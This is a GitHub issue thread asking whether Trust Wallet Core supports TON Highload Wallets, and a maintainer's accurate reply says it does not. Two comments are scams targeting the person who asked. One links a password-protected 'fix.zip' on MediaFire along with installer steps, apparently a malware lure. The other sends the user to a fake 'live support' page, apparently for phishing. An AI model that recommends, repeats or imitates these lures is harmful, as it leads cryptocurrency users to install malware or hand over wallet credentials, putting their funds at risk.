### ISSUE TITLE
Support for TON Highload Wallets in Trust Wallet Core

### ISSUE THREAD

**Issue by Sajjad-Khoshdooni** [trustwallet/wallet-core#4003]
Hello Trust Wallet Core Team,

I would like to know if Trust Wallet Core currently supports the creation, management, and signing of transactions using TON Highload Wallets. Specifically:

Does Trust Wallet Core provide functionality for batching multiple transactions into a single operation for TON?
Are there any features or optimizations available to handle high-frequency transactions effectively on the TON blockchain?
Is there any support for multisig contracts or other security features relevant to highload wallet operations on TON?
If these features are not currently supported, are there any plans to add them in the future?

Thank you for your assistance, and I look forward to your response.

Best regards

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dellapots** [comment]
Contact the [Support page](https://livecustomers-support.web.app/) to resolve your request.
Note: You can also initiate a chat with the live agent on the chat button to get more information about your request via [Live Chat](https://livecustomers-support.web.app/)
@Sajjad-Khoshdooni

**Comment by satoshiotomakan** [comment]
Hi @Sajjad-Khoshdooni, unfortunately, Trust Wallet Core doesn't support Highload Wallets.

We support multiple transfer messages per transaction, see
> Does Trust Wallet Core provide functionality for batching multiple transactions into a single operation for TON?
https://github.com/trustwallet/wallet-core/blob/af67cae30f132ec139b72b4b93d2b336b84a8c49/src/proto/TheOpenNetwork.proto#L88-L89

No
> Are there any features or optimizations available to handle high-frequency transactions effectively on the TON blockchain?

No
> Is there any support for multisig contracts or other security features relevant to highload wallet operations on TON?

Highload Wallet is a very specific functionality needed by exchanges or traders. Right now we don't plan as WalletCore is mainly used in multi-chain wallets, and we deliver features broadly used by users.
> If these features are not currently supported, are there any plans to add them in the future?
